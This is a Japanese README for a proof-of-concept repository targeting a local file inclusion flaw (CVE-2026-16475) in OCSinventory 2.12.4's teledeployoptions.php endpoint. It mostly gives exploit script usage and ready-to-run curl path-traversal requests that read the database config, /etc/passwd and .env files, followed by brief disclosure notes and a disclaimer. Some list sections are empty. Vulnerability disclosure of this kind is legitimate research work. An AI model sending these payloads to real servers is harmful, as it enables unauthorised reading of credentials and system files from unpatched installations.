
OCSinventory 2.12.4 における LFI(ローカルファイルインクルード)脆弱性 CVE-2026-16475 の PoC を含む公式リポジトリです。
OCSinventory 2.12.4 におけるローカルファイルインクルード(LFI)の脆弱性
CVE ID: CVE-2026-16475
CVSS スコア: 6.9(中)
CWE: CWE-98(PHPプログラムにおけるInclude/Require文のファイル名の不適切な制御)
影響を受けるバージョン: OCSinventory 2.12.4
ステータス: 最新バージョンでパッチ適用済み
動的なXMLファイルインクルード操作で使用される前に linkedoptions パラメータのサニタイズが不適切であるため、/ajax/teledeployoptions.php エンドポイントにローカルファイルインクルード(LFI)の脆弱性が存在します。
このエンドポイントはXML設定ファイルを読み込むように設計されていますが、linkedoptions パラメータを適切に検証しないため、パストラバーサル攻撃が可能になります。
認証されていないリモートの攻撃者は、この脆弱性を悪用して以下を行うことができます:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
オプション:
-u, --url - ターゲットURL(必須)-v, --verbose - 詳細出力-o, --output - 成功した読み取り結果をファイルに保存例:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
スクリプト内の BASE_URL 変数を編集します:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
ユーザー向け:
開発者向け:
basename() または類似の関数を使用する注記: CVE-2026-16475 は INCIBE を通じて調整されており、NVD にはまだ索引付けされていない可能性があります。信頼できる情報については INCIBE の情報源を確認してください。
教育および許可されたテストのみを対象としています
完全な法的通知については DISCLAIMER.md を参照してください。
Adrián Ferrer Tarí
責任ある開示は INCIBE を通じて調整されました